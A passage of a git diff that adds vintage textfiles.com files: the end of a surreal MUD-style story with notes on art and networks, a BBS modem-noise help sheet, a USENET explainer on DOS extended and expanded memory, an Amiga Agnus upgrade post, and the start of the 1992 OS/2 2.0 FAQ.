handle when you came in but it seems to >be blank now. +>examine door +>The door is approximately three meters high and one point five +meters wide. +>It appears to be constructed of a mineral compound. There is +are faintly >discernable letters one meter from the floor. +>read letters +>You read the letters but they appear to be in a language you +cannot >understand. +>decipher letters +>"this door opens outwards. PUSH. + +Inane isn't it. +Onwards. + +>push +>The door doesn't open. You curse and kick at the door. + +Amazing, as I have no legs in this reality. +>This display of aggression placates the door gods and the door +opens to reveal >a room: white, glaringly and completely white. +Furnishings were conspicuous by >their absence. The light source +was indeterminate. But it was there. + +Who is responsible for this program anyway? +Jung had something to say about this. +But I can't recall it now. + +Music. I keep hearing music. + +Who owns that goddamn fucking beep! + +Hope this connection holds for a while longer. +I need to get to the end of this.... + +>I'm sorry Dave. I can't let you do that. + +Ha ha. A programmer with a sense of humour. +And sense of history. +Possibly a gift for prophecy. + +>The room was white, glaringly and completely white. Furnishings +were >conspicuous by their absence. The light source was +indeterminate. But it was >there. +>Now however, the walls are circular and someone is running on +them. +>Around and around he goes. +>examine runner +>The runner is an older man, bald and wearing horn rimmed +>glasses. +>He does not answer any questions. So it is pointless asking any. +>examine me +>I don't understand that. +>look me +>I don't understand that +>LOOK ME +>The room was white, glaringly and completely white. Furnishings +were >conspicuous by their absence. The light source was +indeterminate. But it was >there. +>inventory +>You aren't carrying anything. + +I've been here all this time and I don't have anything in my +inventory? + +I have to find a way to shut that beep off. + +>@create exit +>Specify from to +>from here to central station +>There is no central station. Do you wish an alternate? +>y +>Please specify location +>anywhere but the white room +>I don't understand that. +>@quit +>The room was white, glaringly and completely white. Furnishings +were >conspicuous by their absence. The light source was +indeterminate. But it was >there. + +If I shut down this shell I'll never log back on to the system +here. +Its almost impossible to get in, took three days just to log on +and for what? +To get stuck in some programmers idea of a joke. + +He contemplates ways to beat these jokers at their own game. + +>@create portable computer +>A small hand held computer materializes in a corner of the room. +>get computer +>as you pick up the computer a door which was concealed in the +>wall to your >left opens and you see into a room with walls made +entirely of glass. +>out +>Standing in the middle of the room you notice that the walls are +on tracks >which allow them to slide back and open the room to +the outside world. +>also in the room are a large couch, a series of tables covered +in papers, a >black box and a small blue dog. The dog, noticing +you looking at it, wags its >tail and says 'hello, I'm albert.' +>"hello albert +>You say hello albert. +>Albert says 'Do you have any questions for me?' +>"Do I? Who owns that white room? And what is that beep? +>You say 'Do I? Who owns that white room? And what is that +beep?' +>Albert says 'Thank you, that's three added to my collection. I +usually don't >get that many in one line.' +>Albert dematerializes in a shimmering cloud. +>throw computer +>The computer hits the ground with a soft sigh and slowly melts +into the floor. +>open walls +>the walls slide back revealing a forest of beech trees in +winter. + +Reminds me of Denmark. + +>Through the trees you see a castle by the sea. +>out +>You step through the opening, there is a high pitced whining +sound and you feel >a strange prickling at the base of your +skull. +>The room was white, glaringly and completely white. Furnishings +were >conspicuous by their absence. The light source was +indeterminate. But it was >there. + +Fuck, not again! +That beep's got louder too. +What's going on? + +>Thank you, that's another one. + + + +*Art and the zen of computer nets - what do the nets have to +offer artists + +*the art of depicting realities as they really are(or as defined +by the the computer, artist or programmer in any combination) + +*computing B.C. (before calypso) + +*An assembly of meditative turtles and the + +*Maximum entropy- dissipation and formlessness of the nets- who +regulates or is regulation necessary for the various nets +survival?*who owns the road? What could happen to the nets if +they are commercialised. + +*Personae and the adoption of an alternate self- the pros and +cons of electronic communication in a virtual world. MOO's and +the Grasshopper attention spanFlow chart personalities + + +Are MUDs more than just games? Is art more than just games? + + +heirarchical access to the net and to parts of the net, hackers +and encryption + + I can see the ease that a person with a modicum of musical +knowledge and a few thousand dollars worth of hardware and +software could create a digitally produced, edited and recorded +song or entire compact disc. Taking a DAT tape to a company +which presses cds. + + manipulation of photographic images and the implications of +this-graphics art tool + + Internet and all its glory- as a resource, a means of +distribution and as a replacement for the postal system. + + Umberto Eco in Foucault's Pendulum talks about memory, how we +use it and how computers have changed how we use it. +"This is better than real memory, because real memory, at the +cost of much effort, learns to remember but not to forget. ... +there is no discipline of forgetting; we are at the mercy of +random drugs, alcohol, or suicide. Abu [ computer] , however, +can aphasias. +Where were you last night, L +There, indiscrete reader: you will never know it, but that half + line hanging in space was actually the beginning of a +long sentence that I wrote but then wished that I hadn't, +wished I hadn't even thought let alone written it, wished that +it had never happened. So I pressed a key, and a milky film +spread over the fatal and inopportune lines, and I pressed delete +and, woosh, all gone. +But that's not all. The problem with suicide is that sometimes +you jump out of the window and then change your mind between the +eighth floor and the seventh. " Oh if only I could go back!" +Sorry, you can't, too bad. Splat. Abu, on the other hand, is +merciful, he grants you the right to change your mind: you can +recover your deleted text by pressing retrieve. What a relief! +Once I know that I can remember whenever I like, I forget. + +-distribution +- information +- communication +- access to the information systems + +The merits of expanded communication but what value is placed on +the content by the communicants? Does distance communication +work? It eliminates the false signals of body language and +inflection to some degree but it allso lacks something because of +this. + + + is the internet truly a new frontier or is it merely so labeled +in the American spirit of exp + \ No newline at end of file diff --git a/textfiles.com/computers/execnois.txt b/textfiles.com/computers/execnois.txt new file mode 100644 index 00000000..44b4bc71 --- /dev/null +++ b/textfiles.com/computers/execnois.txt @@ -0,0 +1,71 @@ +From Exec-PC Multi-user BBS, 414-964-5160 +Bob Mahoney, SYSOP 7/16/87 +----------------------------------------- + +IF YOU ARE GETTING GARBAGE ON THE SCREEN, OR ARE HAVING TROUBLE +COMPLETING FILE TRANFERS: + +If you see random characters on your screen, or if file transfers involve +many retransmitted blocks or aborts, or if you can only get a good connect +at lower baud rates, then this help info is for you. There is probably a +problem in either the quality of the phone line connection you have between +your modem and the Exec-PC modem, or your modem has a problem, or there +is a bad modem on Exec-PC. + +FIRST THINGS FIRST: It is unlikely the modem is bad on Exec-PC. If we have +a bad modem, our callers tell us about it within a day or two, and we replace +the bad modem. If you have a consistent connect problem, then it is probably +not caused by a modem on Exec-PC. Also, if you get the noise problems on more +than one line (node number) of Exec-PC, it is highly unlikely that we have +more than one bad modem here, so the problem lies elsewhere. + +BAD PHONE CONNECTION: Most of the bad phone noise problems occur on long +distance connections. We have, however, helped people with bad connections +on LOCAL calls. You never know when the phone company has provided a marginal +connection until you start getting problems with your modem. In the worst +case, you will be able to hear the noise on the line if you pick up a phone +and hear scratching or hissing noises. If you can hear the noise, call the +phone company and insist on a fix. + +LONG DISTANCE PROBLEMS: The majority of the noise problems come from a poor +quality connection through a long distance service. Many people tell me, "I +use AT&T, so it is not a problem with the phone service." Maybe yes, maybe +no. ALL long distance vendors, including AT&T have variance in the quality of +their service. When in doubt, try a different vendor. If you do not know how +to gain access to a different long distance vendor, call your phone company +and have them explain it to you. It is your legal right to have easy access +to alternative long distance vendors. + +Some people have fixed problems by switching from US Sprint to AT&T, while +others have gained a perfect connection by switching from AT&T to US Sprint, +or to MCI, or to any of the dozen other long distance services. + +MODEM PROBLEMS: Last but not least, many people have found out their bargain +modem was not such a bargain after all. If you suspect your modem may have +a problem, it is best to borrow a friends modem and try it in place of your +modem. If the problem persists, try using a different phone outlet in your +home of office, perhaps a different phone line if another is available. When +the problem goes away, you know what was causing it. + +If it turns out your modem is causing the poor connects to Exec-PC, then you +should contact the manufacturer, dealer, or distributor of the modem and +describe the problem to them. Tell them the problem goes away when the modem +is replaced with another modem. This will convince them to either repair or +replace your modem. + +PC PURSUIT USERS: Although you may not expect it, PC Pursuit sometimes causes +line noise problems and file transfer problems. The PCP concept requires +that 4 modems be talking clearly in order to establish a good connection +for you. From our recent experience, the connections are not always +perfect. The usual cause of the problem is between your PC and the local +PCP modem you are dialing into. Some people have fixed the problem by calling +Telenet customer support and asking them for alternate access numbers for +the local Telenet node they are dialing into. + + + +In every case I have encountered in the past 4 years, one of the above +techniques has solved the connect problem. + +End of info. + \ No newline at end of file diff --git a/textfiles.com/computers/ext-ram.txt b/textfiles.com/computers/ext-ram.txt new file mode 100644 index 00000000..2321c3d7 --- /dev/null +++ b/textfiles.com/computers/ext-ram.txt @@ -0,0 +1,311 @@ +This article appeared on USENET + +Subject: Re: Extended Memory +From: (Raymond Dunn @ Philips Electronics Ltd. - St. Laurent P.Q., Canada) + + + +Memory up to 1 Megabyte: +----------------------- + +MSDOS is designed around the 8088 CPU which can address up to 1 megabyte of +memory. + +In "industry standard" IBM PC architecture, this memory is organized in the +following way: + + 1M +-------------+ FFFFF + | | System BIOS ROM + | | + | | + | | + 960K +-------------+ F0000 + | | Option ROM and RAM + | | + | | + 816K +-------------+ CC000 + | | XT Hard Disk Controller BIOS ROM + 800K +-------------+ C8000 + | | Video BIOS ROM and option ROM and RAM + | | + 768K +-------------+ C0000 + | | Video RAM space - various video types + | | have different requirements and starting + | | locations. + | | + 640K +-------------+ A0000 + | | + | | + | | Base system RAM + | | + | | + 1286 +-------------+ 506 + | | Interrupt vectors and BIOS data area + 0 +-------------+ 0 + +MSDOS expects this architecture, and assumes that the RAM up to 640K is +its resource to manage. + +Although MSDOS will not expect to find any RAM above 640K except video RAM, +even though there actually may be some which it could use, e.g. unused on a +video card, on a special option card etc, it *will* however use any memory +immediately above 640K if the BIOS specifies it is available. This is +communicated to MSDOS at boot time by BIOS setting the memory size in location +413H of the BIOS data area. + +As an example of this, the Philips P3345 386SX based machine allows the system +to be configured so that 64K is allocated at 640K to give a total of 704K of +"base" system RAM. This is *only* legal if an EGA/VGA video card is not +present, as this has video RAM at this address. + + Some option cards provide RAM at other locations in the map. Applications +programs may use that RAM in a proprietary way. It is not normally considered +a DOS resource. + +An example of this is the Philips P3105 XT system. It is more convenient on +this machine to provide 768K of RAM using all 256K chips rather than be +involved with 64K chips to provide 640K. This "extra" 128K of RAM can be +enabled if required at D0000. A ramdisk driver is provided to use this +memory. + + +Extended and Expanded Memory: +---------------------------- + +Extended memory is an intrinsic part of the architecture of the Intel +processor family, expanded memory is only defined in the architecture of the +IBM-PC standard. + +*Extended* memory is memory directly in the CPU memory address space, above +the 1 megabyte address. + +It is "extended" because the 8088 can only access 1 meg. Thus "extended + memory" is part of the "extended memory addressing" of the 80286 & 80386 +processors. + +*Expanded* memory is paged memory which can be addressed through a Page Frame +within the first 1 megabyte, and is thus accessible on all processors, even the +8088. Expanded memory can be provided in a number of ways (see below). + +The mnemonic is easy, it is in the meaning of the words: + +-> -> -> Extended is longer. <- <- <- + +-> -> -> Expanded is fatter. <- <- <- + +When you buy an 80286, 80386 or 80386SX based machine which has more than 640K +of RAM, that extra memory must be mapped somewhere, because *normally*, in the +architecture of the PC, the area between 640K and 1M is used for video RAM, +option card ROM and RAM, and the BIOS ROM. + +Some machines map the 384K from this hole on top of any *other* extended +memory above 1M. I.e. if the machine has 1M memory, the 384K is mapped at +1M. If the machine has 2M memory, the 384K is mapped at 2M etc. + + Some machines just map the memory away out of trouble at say 16 or 24Meg. + +Some machines use all or part of it to "shadow" the system BIOS, and +sometimes a proprietary Video BIOS. Thus during system initialization, these +BIOSes are copied from ROM into the fast (16-bit or 32-bit) RAM, +write-protected, and the BIOS from then on executes from there. This +obviously requires motherboard hardware support. + +Some machines allow all or part of the extended memory to be used as +expanded memory. This is achieved either by hardware support or software +emulation as described below. + +*Some* machines allow all sorts of permutations of the above! This is an +area where manufacturers of clones can *add value*. + + + +Extended Memory: +--------------- + +As *MSDOS* assumes an 8088 and can thus only address the first 1 Megabyte of +the address space, extended memory on a 286 or 386 has limited use with DOS. + +It is most commonly used as a RAM disk, because this involves only *block* +access to the memory and is a nicely self-contained application, but it +could also be used for caching, directly by an application, or to implement +some *Expanded* Memory Scheme (EMS). + +An 80286 has a 24 bit address space, i.e. 16 megabytes (1 meg plus 15 meg of +extended memory). + +An 80386 has a full 32 bit address space (work it out yourself!). Most AT +architecture implementations using an 80386 use a private memory address bus +which limits the addressing to 16 or 24 or 32 Megabytes. + +Extended memory is not generally used in the MSDOS environment other than by +RAM disk programs, disk caches, and expanded memory emulations, for several +reasons: + +- It is not available on 8088 machines so *applications* which wish to be +compatible across the whole product line stay away from using it directly. + +- It is not a standard resource, so there is no proper management of it for +co-existing software (but see MSDOS 4.0 below). + +- It is very slow and a pain in the neck to access because MSDOS runs the +80286 in native mode (i.e. as an 8088). To access above 1 meg the 80286 must +be switched into protected mode. This is fine, but there is no way to switch +it back to native mode (this is one of the reasons that the 80286 is regarded +as a brain-dead processor)!! So, the trick used is to get the keyboard +controller to RESET the CPU, and the BIOS reset code recognizes this and +continues! Thus it is really only good for some sort of *block* access to the +memory, and there is an INT15 function in the BIOS which does this for you. +All of this can be done more easily on an 80386, using its virtual 86 mode, +but there are other problems running DOS in this mode (you have to trap I/O +etc) and I wont go into that here. There are also the usual "how does the DMA +interact with logical addressing" type problems. + +The good news is that Unix and OS/2 make *full* use of extended memory, as +they run the machine in protected mode. + +With release 4.0, MSDOS recognizes extended memory for the first time as +more than just a RAM disk resource. In addition to RAMDRIVE.SYS and a disk +caching program, SMARTDRV.SYS, a device driver, HIMEM.SYS, is provided to +manage the extended memory according to XMS 2.0 specification. + + XMS is an eXtended Memory Specification standard defined jointly by +Microsoft, Intel, Lotus and AST (not to be confused with LIM, see below). +This specification is available from them. XMS 2.0 allows extended memory +to be used by co-resident software, and, for example, allows TSR's to be +positioned in extended memory. + +Very few applications are currently written to make use of this standard - +it is somewhat ironic that the provided RAM disk and disk caching routines +RAMDRIVE.SYS and SMARTDRV.SYS do *not* use the XMS management routines when +using extended memory, but *do* use LIM 4.0 when using expanded memory (see +below)! + +XMS 2.0 also formally makes the first 64K of extended memory available as a +non protected mode memory resource using the overflow into A20 trick. + + +Expanded Memory: +--------------- + +There have been several standards for expanded memory. Currently this has +settled down into the LIM 4.0 standard (_L_otus _I_ntel _M_icrosoft in +agreement). + +LIM 4.0 describes the following architecture: + + PC MAIN MEMORY LIM EXPANDED MEMORY + -------------- ------------------- + + +-------------+ + | | + . Extended . + . Memory . + . up to . /+-------------+ 32M + . 16M on the . // | | + . '286, . / / | | + . 4096M on . / / | Expanded | + . the '386 . / / | Memory | + | | / / | | + 1M +-------------+ / / | Divided | + | | / / | into 16K | + 960K +-------------+ / | logical | + | Page Frame | / | pages | + | 12*16K | / | | + | Physical | / | | + | Pages | / | | + 768K +-------------+\ / . . + | | / . . + 640K +-------------+/ \ . . + | Page Frame | \ . . + | 24*16K | \ | | + | Physical | \ | | + | Pages | \ | | + | | \ | | + 256K +-------------+ \ | | + | | \ \ | | + | | \ \ | | + | | \ \ | | + 0 +-------------+ \ \ | | + \ \ | | + \ \ | | + \ \| | + \+-------------+ 0 + +The expanded memory gives you up to 32M to map into up to 36 16K pages in +the positions shown above. + + The page frame below 640K which allows the existing RAM to be shadowed are +usually regarded as being for the use of operating systems/environments. +The page frame above 640K, in the video RAM and "PROM" area, is for +applications. Code can be run or data stored interchangably in any of these +frames. + +30 functions are defined using int 67H, to allocate, map, swap etc these +pages. These are provided, depending on the implementation, as a loadable +driver (usually), an extension to the motherboard BIOS, or on a PROM on a LIM +4.0 option card (not usual). + +The number of actual pages available in the page frame depends on the +implementaion, and how much of the address space is already occupied by +option card ROMS (and perhaps RAM's) in the machine. + +Applications which use LIM 4.0 can thus have a very large physical memory +available to them, but must access it by manually switching pages as +required (come back Z80 systems, all is forgiven!!) + +LIM 4.0 can be implemented in many ways: + +- as an option card with memory and page registers etc as I/O hardware to + provide the mapping etc, and an on-board BIOS PROM to provide the +functionality. + +- as a pure software emulation in a .SYS or TSR driver: + + - using extended memory and virtual 86 mode on an 80386 so that the + memory is mapped using the MMU into any of the physical LIM pages. + + - *copying* into the RAM pages existing below 640K, either from extended + memory (if other than 8088), or from, say, disk. This is much slower as + pages are swapped using copying rather than just updating page registers. + +- using extended memory and mapping and page register logic built into the +motherboard ASICs or logic on an 80286 or 80386 machine. Philips has two +machines using this approach, the 80386SX based P3345 using the NEAT chipset, +and the 80286 based P2230 using the G2 chipset. + +- combinations of the above etc. + +LIM 4.0 management is handled by its BIOS only in so far as the application +can ask it what pages are free, how much memory is free to map etc., and to +perform the actual mapping. The actual use of this paging is left up to the + application. Neither LIM 4.0 nor DOS demand pages or anything remotely like +that, nor do they support an application's use of LIM in any other way. Two +or more co-existing applications can share the LIM quite happily if they are +well behaved (i.e. use LIM *only* through the BIOS calls). + +Functionality is provided to allow the saving and restoring of the page +registers etc, so that even interrupt routines can safely be written to use +LIM memory, assuming they allocate all their requirements up front. + +Whether or not LIM memory will be useful to you is *application* dependant. +Check to see if the applications you propose to use can take advantage of +it. + +Release 4.0x of MSDOS *does* recognize LIM 4.0's presence, and allows buffers +and fastopen file names etc to be allocated in LIM pages, and DEBUG now +"understands" LIM. In no way is LIM *integrated* into the operating system +though. A driver, EMM386.SYS, is provided in DOS 4.0 to emulate LIM 4.0 using +the *extended* memory of a 386 based machine. + +The RAM disk and disk caching routines RAMDRIVE.SYS and SMARTDRV.SYS can be +configured to use extended memory, *or* expanded memory under the control of +LIM 4.0. + +The "Lotus/Intel/Microsoft Expanded Memory Specification Version 4.0" +(published by, you guessed it, Lotus, Intel and Microsoft), is the +definitive manual, and is available from them. + +-- +Ray Dunn. +Philips Electronics Ltd. | TEL : (514) 744-8200 Ext: 2347 + \ No newline at end of file diff --git a/textfiles.com/computers/fangrev3a500 b/textfiles.com/computers/fangrev3a500 new file mode 100644 index 00000000..7361fae2 --- /dev/null +++ b/textfiles.com/computers/fangrev3a500 @@ -0,0 +1,62 @@ +From luth!sunic!mcsun!hp4nl!telmail!neabbs!johans Wed Nov 1 12:30:45 MET 1989 +Article 36064 of comp.sys.amiga: +Path: luth!sunic!mcsun!hp4nl!telmail!neabbs!johans +>From: johans@neabbs.UUCP (HANS VAN DER WERF) +Newsgroups: comp.sys.amiga +Subject: Fatter Agnus +Message-ID: <237122@neabbs.UUCP> +Date: 30 Oct 89 18:28:14 GMT +Organization: NEABBS multi-line BBS +31-20-717666 (13x), Amsterdam, Holland +Lines: 49 + + + + Hi there superfat Agus fans, + + here is the story of upgrading my A500 to 1MB Agnus. + After buying the Fat Lady (dfl 150,-) i opened up my A500 (for the + first time). I assumed that i had a REV 5 board, so the transition + should be fairly easy. What i found after removing all screws and + and shielding defies description. First of all there was no JP2 + between the ROM and the CPU (oink), second there was no REV number on + the board (what ???), thirdly the _ROMEN pin on the Kickstart ROM was + torn out of its socket. Soldered to it was a blue wire wich on the + other end connected to a 3D mounted transistor (shiver). After uttering + some strong words i also removed the bottom shielding. This revealed + some more manual modifications, and last but not least the REV number. + The REV number said 3. After sitting down and taking a deep breath i + tried to think of a sunny side of all this. All i could come up with + was that this board might be a collectors item by now (anybody + interested???). + + Now how to put Mrs. Obese in there? Since there was no JP2 i made my + own. What JP2 does on REV 5 boards is connecting A19 on Agnus to A23 + or A19 on the CPU address bus. My Agnus A19 was hardwired to A23 on + the CPU address bus. So i carefully cut this connection on the bottom + side of the board between the CPU pins. Then i soldered in a new + connection from the CPU A19 (pin 47) to where the previously cut + connection runs through the board from bottom side to top side, thus + effectuating a connection between CPU A19 and Agnus A19. The rest is + fairly straight forward. The _EXRAM signal on GARY must be kept high + thus preventing it to detect the RAM expansion. I did this by cutting + the connection near the GARY socket (pin 32) on the top side of the + board. The connection to a pullup which keeps pin 32 at VCC is still + intact since it runs under the socket in the opposite direction. + + Now the only thing left to do was replacing HER. Ahh, wait a minute + wasn't there something about Agnus pin 41 and PAL/NTSC. Yes, Agnus + pin 41 should be kept at a high level to force a PAL display. Because + i live in Europe i'm kinda attached to PAL. So i bent the pin 41 + inside the Agnus socket outward (careful now), preventing it from + forcing the PAL/NTSC input to GND level. After putting Humpty Dumpty + back together again, i crossed my fingers and turned on the power .... + It worked. Avail reported somewhat over 1040K chipmem, hmm nice. + + I'am still in the process of trying out what software works, and what + doesn't anymore. Up till now only ACT OUT refused work altogether, + actually it GURUed. Furthermore, it is a pity that you must have fast + ram to use DPAINT-III's animation features. By the way, is there somebody + out there who has a list of programms that freak out when a 8272(A) is + installed ??? + + diff --git a/textfiles.com/computers/faq.txt b/textfiles.com/computers/faq.txt new file mode 100644 index 00000000..63615122 --- /dev/null +++ b/textfiles.com/computers/faq.txt @@ -0,0 +1,1030 @@ + +Archive-name: os2-faq +Version: 2.0 + +OS/2 Frequently Asked Questions List: User's Edition +Release 2.0; April 25, 1992 +Compiled by Timothy F. Sipples + +Introduction: For changes/suggestions/additions please mail +sip1@ellis.uchicago.edu. This List may be freely distributed. Mention +of a product does not constitute an endorsement. Answers to questions +closer to the bottom of the List may rely on information given in prior +answers. Customers outside the United States should not necessarily +rely on 800 telephone numbers, part numbers, or upgrade policies +contained in this List. + +Release Notes: With OS/2 2.0 arriving in stores this List arrives at +Release 2.0. Many thanks for the suggestions/corrections -- please keep +them coming. Reminder to BBS operators and other archivists: please +retain a copy of Release 1.9g of this List, the last release to cover +OS/2 1.x in any detail. The Programmer's Edition of the FAQ List is +coming; netmail bjaspan@mit.edu with your contributions. Questions 1, +2, 4, 5, 6, 7, 8, 10, 11, 17, 18, 22, 26, and 29 have been revised since +Release 1.9z. + +Questions Addressed in this Release: + +(1) What is OS/2? +(2) What are the differences between versions? +(3) What is Extended Services/2? +(4) How good is OS/2 2.0's DOS and Windows compatibility? +(5) Where can I buy OS/2? +(6) How much does OS/2 2.0 cost? +(7) What hardware do I need to run IBM OS/2 2.0? Do I need a PS/2? +(8) What applications are available for OS/2? +(9) Where can I obtain OS/2 shareware and freeware? +(10) I am having trouble installing OS/2 2.0. What should I do? +(11) Will OS/2 2.0 work with my SuperVGA adapter? +(12) Will OS/2 2.0 work with my printer? +(13) How do I access HPFS partitions on my hard drive without booting + from the hard drive? I'm getting error messages now -- how do I + "repair" my hard disk? +(14) I can't install OS/2 from Drive B. What's wrong? +(15) Is there a Norton Utilities for OS/2? +(16) Sometimes OS/2 2.0 will freeze when I run an application? What do + I do? +(17) My dealer doesn't know OS/2 from Unix. How can I get answers to + my OS/2 questions? +(18) Why should I use HPFS? What does it offer me? Does it work with + DOS? +(19) I'm a Unix wizard. How do I make OS/2 resemble Unix? +(20) I prefer Windows. How do I make OS/2 2.0 resemble Windows (or + OS/2 1.3)? +(21) I would like to set up an OS/2 BBS. What is available? +(22) Can I use COM3 and COM4 in OS/2 2.0? +(23) How do I start a background process from the OS/2 command line? +(24) What are CSDs, how do I tell which I have, and where do I get + them? +(25) How do I add new Adobe Type Manager typefaces? +(26) How do I tweak OS/2 2.0 for maximum performance? +(27) What networking products are available for OS/2 2.0? +(28) Should I worry about viruses when running OS/2 2.0? +(29) Are there any clever tricks that apply to OS/2 2.0? + +---------------------------------------------------------------------- + +(1) What is OS/2? + +OS/2 is an advanced operating system for PCs and PS/2s with an 80286 +processor or better. It was codeveloped by Microsoft and IBM and +envisioned as the successor to DOS. + +It was designed from the ground up with preemptive multitasking and +multithreading in mind. It also protects applications from one another +(a single misbehaved program will not typically disrupt the entire +system), supports multimegabytes of physical RAM, and supplies virtual +memory to applications as requested, breaking DOS's 640K barrier. + +As shipped, it does not support multiuser operation, although third +parties have grafted multiuser capabilities onto the base operating +system. Remote-OS, OS2YOU, Citrix, and PolyMod2 are four such products. +Remote-OS is published by The Software Lifeline, tel. 407-994-4466, and +OS2YOU is available from the OS/2 shareware/freeware sources (see +Question 9). Citrix Systems can be reached at 305-755-0559. PolyMod2's +publisher, MemSoft, can be reached at 407-997-????. + +------------------------------ + +(2) What are the differences between versions? + +IBM OS/2 Version 2.0 (CSD Level 02000, see Question 24) is now widely +available in retail release. Version 2.0 will run only on machines with +an 80386SX processor or better. IBM is (now) developing OS/2 (and its +Intel and non-Intel-based successors) independently but is involving +third party PC manufacturers in its testing. Improvements include the +ability to preemptively multitask DOS, Windows 2.x, and Windows 3.0 +(real and standard mode) applications (without purchasing any of these +environments) in separate, robust, protected sessions; an object- +oriented Workplace Shell (WPS); a multiple operating system boot +mechanism; new 32-bit programming interfaces; support for more than 16 +MB of physical RAM; and more third party device drivers. It also +provides EMS 3.2/4.0 and XMS 2.0/DPMI 0.9 (expanded and extended memory) +services to DOS and Windows applications. OS/2 1.x applications, +unmodified, still run under OS/2 2.0. + +IBM OS/2 Version 1.3 is the last release of OS/2 to operate on PCs with +80286 CPUs. This version introduced built-in Adobe Type Manager (ATM), +providing scalable typefaces for screen and printer, and reduced memory +requirements. Procedures Language/2 (a.k.a. REXX), a powerful batch- +oriented programming language, became a part of Standard Edition with +this release. (A few OEMs are shipping Microsoft OS/2 Version 1.3, but +Microsoft has all but abandoned OS/2 development.) + +OS/2 Version 1.2 was the first to incorporate the High Performance File +System (HPFS, which supports long file names). With this release IBM +OS/2 added a dual boot mechanism and IBM Extended Edition introduced +REXX. + +OS/2 Version 1.1 was the first to include the Presentation Manager (PM) +GUI/API, now an integral part of the operating system. Microsoft OEM +versions added a dual boot mechanism with this release. + +OS/2 Version 1.0, introduced in 1987, was the first release of OS/2. +Task switching was accomplished through a character-based shell and +limited DOS compatibility was provided. + +------------------------------ + +(3) What is Extended Services/2? + +Prior to Version 2.0, IBM offered two separate packages with each +release of OS/2: Standard Edition and Extended Edition. Extended +Edition included extra, bundled software products: the Communications +Manager (for communication with IBM mainframes, minicomputers, and other +hosts), Database Manager (a full, network aware, relational database), +and LAN Requester. + +IBM has now unbundled the Extended Edition features, dropped LAN +Requester from the package (now available separately, with IBM's LAN +Server product), updated it for OS/2 2.0, and renamed it Extended +Services/2 1.0. ES/2, by itself, no longer includes the base operating +system as Extended Edition once did. + +This new arrangement makes it easier to update the base operating system +with CSDs (see Question 24). And now ES/2 1.0 will run under OS/2 1.3 +Standard Edition as well as OS/2 2.0. Also, ES/2 1.0, like OS/2 2.0 +itself, is designed to operate on both IBM and non-IBM systems (see +Question 7). + +------------------------------ + +(4) How good is OS/2 2.0's DOS and Windows compatibility? + +OS/2 1.x justifiably earned a reputation for poor DOS compatibility. +Since it was designed for the 80286, it could not run more than one DOS +application at a time. + +The situation has changed dramatically with OS/2 2.0. Version 2.0 +preemptively multitasks DOS and Windows (real and standard mode) +applications in separate, protected sessions, without purchasing either +environment. + +OS/2 2.0 provides a complete DOS emulation equivalent to DOS 5.0. The +operating system can provide each DOS application with up to 32 MB of +EMS 4.0 (expanded memory), 16 MB of XMS 2.0 (extended memory), and/or +512 MB of DPMI 0.9 (DOS Protected Mode Interface extended memory), all +from its pool of physical and/or virtual memory (meaning you do not have +to have as much RAM in your system as your applications request). These +limits are in addition to the up to 730K free conventional memory +supplied to each DOS application, even after mouse and network drivers +are loaded. As in DOS 5.0, DOS code and device drivers may be loaded +into high memory. A 386 memory manager like QEMM or 386Max is not +needed -- these features are provided by OS/2 2.0 directly. + +The DOS emulation allows customization of device driver sets -- each DOS +application shares a systemwide CONFIG.SYS and the equivalent of its own +CONFIG.SYS. Also, there is a systemwide AUTOEXEC.BAT file; batch +commands particular to each DOS application can be invoked using +separate, application-specific batch files. And many DOS Settings are +provided to fine tune each DOS/Windows application's behavior (e.g. +IDLE_SENSITIVITY, VIDEO_RETRACE_EMULATION, etc). The most popular +DOS/Windows applications on your hard disk will be migrated +automatically when you install OS/2 2.0. + +In addition, OS/2 2.0 will boot one or more specific versions of DOS in +separate sessions, to assist in running particularly difficult +applications. So, for example, it is possible to multitask DOS 3.3, DOS +4.0, DOS 5.0, emulated DOS, and Desqview running atop DOS, all in +separate sessions, either windowed or full screen, all with the same +and/or separate device drivers, TSRs, environment variables, etc. These +boot images may be stored on a hard disk. (Under OS/2 2.0, the commands +VMBOOT, VMDISK, and the Installation Guide will assist in booting real +versions of DOS.) + +Standard graphics modes (generally up to the resolution of the desktop; +see Question 11) are supported in DOS windows, as are selectable text +mode typefaces. Cut/paste to/from windowed DOS applications is +supported (to/from other DOS, OS/2, and Windows applications), including +graphics cut/paste. Theoretically, OS/2 2.0 will run up to 240 +simultaneous DOS/Windows sessions; the practical maximum depends on +system resources. OS/2 2.0 will provide math coprocessor emulation for +DOS/Windows programs if a math coprocessor is not present or if the 386 +CPU's step level is below D0. (Check your 80386's step level using the +utility 386Step, available from the OS/2 shareware/freeware sources; see +Question 9. Run it under native DOS, i.e. not while running OS/2 2.0.) + +OS/2 2.0 will, in fact, run virtually all DOS applications in existence, +including notorious ones such as Microsoft Flight Simulator, Wing +Commander, Maple (latest version), MatLab (latest version), and others. +Those that do not run generally fall into the following categories: + +(a) Programs that use Virtual Control Program Interface (VCPI) memory +extenders or other extenders which require direct access to the 80386 +control registers. Since such applications are also all but +incompatible with Windows, most vendors have program updates for DPMI +compatibility, which OS/2 2.0 does support; + +(b) Application programs which attempt to directly address the physical +sectors of an OS/2 managed nonremoveable hard disk drive. Such programs +include UnErase in Norton Utilities, for example. Fortunately OS/2 2.0 +has a built-in UnDelete feature which is more robust than Norton's +approach. (Consult the online Command Reference for information on how +to enable UNDELETE); + +(c) Timing sensitive DOS applications. Certain DOS programs that +generate digitized sound through the PC's internal speaker may have +distorted sound. High speed, real time data collection may be +compromised. These problems can often be minimized or even eliminated +using OS/2 2.0's DOS Settings. + +(d) DOS programming debuggers. DOS applications running under OS/2 2.0 +are not permitted to access the debug registers DR0-DR7 from a DOS +session. Also, DOS debuggers will not be able to set hardware +breakpoints, and all read/write operations to debug registers in virtual +8086 mode will be ignored. + +Generally DOS backup programs will work under OS/2 2.0, but they may not +capture some of the OS/2 data (especially extended attributes) on the +hard disk. OS/2 backup tools are available, notably IBM's PMTape, Sytos +Plus, EZTape/PM, and a port of GNUtar. DOS-based disk caching software +is not required since OS/2 includes a built-in, highly configurable, +more efficient disk cache. + +DOS programs running under OS/2 2.0 are extremely fast. A single DOS +application (no other applications open) running full screen under OS/2 +2.0 typically achieves 95-97% of the performance it would have under +native DOS. If the DOS application performs any disk I/O it can +actually operate faster than it would if running under native DOS. It +is not unheard of for disk intensive DOS applications to run twice or +even three times as fast under OS/2 2.0. + +If pure DOS is absolutely required, OS/2 2.0 includes a utility called +the Boot Manager. The Boot Manager can provide a menu listing all the +operating systems available on the system and will allow selection of +any one at 